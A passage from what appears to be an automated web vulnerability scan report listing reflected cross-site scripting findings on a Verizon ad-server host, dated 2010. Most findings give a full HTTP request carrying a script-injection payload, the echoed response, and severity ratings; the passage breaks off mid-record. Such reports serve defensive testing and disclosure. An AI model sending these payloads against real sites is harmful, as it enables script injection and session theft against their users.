GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=8a690"><script>alert(1)</script>2618c9bf78&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:57:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=8a690"><script>alert(1)</script>2618c9bf78&search=" target="_top">
...[SNIP]...

2.606. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [webhosting parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the webhosting request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60f4c"><script>alert(1)</script>718101defe9 was submitted in the webhosting parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=60f4c"><script>alert(1)</script>718101defe9&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:57:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
opservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=60f4c"><script>alert(1)</script>718101defe9&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.607. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 248e6"><script>alert(1)</script>2f9b6fbafed was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/248e6"><script>alert(1)</script>2f9b6fbafed/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: oascentral.verizononline.com
Cookie: OAX=rnoX2kzpSVMAAfaW; RMFD=011PKCotO10esZq8|O10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:19:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 417
Content-Type: text/html
Cache-Control: private
Content-Length: 417

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/248e6"><script>alert(1)</script>2f9b6fbafed/script>HOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/97
...[SNIP]...

2.608. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c2fff(a)e8ffd0c4087 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3Cc2fff(a)e8ffd0c4087/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: oascentral.verizononline.com
Cookie: OAX=rnoX2kzpSVMAAfaW; RMFD=011PKCotO10esZq8|O10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:19:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 432
Content-Type: text/html
Cache-Control: private
Content-Length: 432

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net8b439"><script>alert(1)<c2fff(a)e8ffd0c4087/script>HOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.
...[SNIP]...

2.609. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ba674(a)eda3ea76865 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/ba674(a)eda3ea76865/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: oascentral.verizononline.com
Cookie: OAX=rnoX2kzpSVMAAfaW; RMFD=011PKCotO10esZq8|O10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:19:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 361
Content-Type: text/html
Cache-Control: private
Content-Length: 361

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net8b439"><script>alert(1)</ba674(a)eda3ea76865/homepage/1900168126/Top/default/empty.gif/726e6f58326b7a7053564d4141666157?x" target="_top">
...[SNIP]...

2.610. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27ce5<script>alert(1)</script>cd3bac88e56 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT27ce5<script>alert(1)</script>cd3bac88e56/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: oascentral.verizononline.com
Cookie: OAX=rnoX2kzpSVMAAfaW; RMFD=011PKCotO10esZq8|O10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:19:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 454
Content-Type: text/html
Cache-Control: private
Content-Length: 454

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net8b439"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT27ce5<script>alert(1)</script>cd3bac88e56/homepage/324442974/Top/default/empty.gif/726e6f58326b7a7053564d4141666157?x" target="_top">
...[SNIP]...

2.611. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e52b7<script>alert(1)</script>db27b16150c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepagee52b7<script>alert(1)</script>db27b16150c/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: oascentral.verizononline.com
Cookie: OAX=rnoX2kzpSVMAAfaW; RMFD=011PKCotO10esZq8|O10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:20:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 454
Content-Type: text/html
Cache-Control: private
Content-Length: 454

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net8b439"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepagee52b7<script>alert(1)</script>db27b16150c/697276937/Top/default/empty.gif/726e6f58326b7a7053564d4141666157?x" target="_top">
...[SNIP]...

2.612. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload ea967<script>alert(1)</script>2af78750aff was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Topea967<script>alert(1)</script>2af78750aff?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: oascentral.verizononline.com
Cookie: OAX=rnoX2kzpSVMAAfaW; RMFD=011PKCotO10esZq8|O10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:20:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 444
Content-Type: text/html
Cache-Control: private
Content-Length: 444

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net8b439"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/5619724/Topea967<script>alert(1)</script>2af78750aff/default/empty.gif/726e6f58326b7a7053564d4141666157?x" target="_top">
...[SNIP]...

2.613. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7b378(a)0c48aea9c9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C7b378(a)0c48aea9c9/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:54:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 447
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3b45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 447

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net8b439"><script>alert(document.cookies)<7b378(a)0c48aea9c9/script>HOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONON
...[SNIP]...

2.614. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2261"><script>alert(1)</script>640cad2cd4b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/d2261"><script>alert(1)</script>640cad2cd4b/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:54:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 418
Content-Type: text/html
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 418

<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/d2261"><script>alert(1)</script>640cad2cd4b/script>HOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/13
...[SNIP]...

2.615. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439%22%3E%3Cscript%3Ealert(document.cookies)%3C/script%3EHOYT.LLC.XSS.PoC.11.21.2010.OASCENTRAL.VERIZONONLINE.COM.1333.GMT/homepage/2790@Top

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b73fe<script>alert(1)</script>97455ab54ef was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

